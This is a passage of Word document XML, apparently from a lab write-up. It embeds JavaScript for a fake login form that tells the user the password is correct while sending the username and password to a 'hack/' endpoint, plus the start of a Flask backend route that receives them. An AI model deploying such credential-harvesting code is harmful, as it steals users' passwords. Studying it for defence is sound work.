+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>const headers = {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"Access-Control-Allow-Credentials": true,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"Access-Control-Allow-Origin": "*",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"Content-Type": "application/json",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>const method = 'GET';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>const button = document.getElementById('login');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>button.onclick = function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    const username = document.getElementById('username').value;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    const password = document.getElementById('password').value;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    if (!username || !password){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        window.alert('Empty username or password! Try again.');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    window.alert('the password is correect');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    const path = 'hack/'+ username + '/' + password;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    api.makeAPIRequest(path, {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        method, headers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }).then(function (res) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        console.log(res);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    });</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>};</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>e also start the backend</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with python code as following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>from flask import Flask</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>from flask_restplus import Resource,Api</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>from flask_cors import CORS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>app = Flask(__name__)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>api = Api(app)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>@api.route('/hack/&lt;string:username&gt;/&lt;string:password&gt;',methods=['OPTIONS'])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
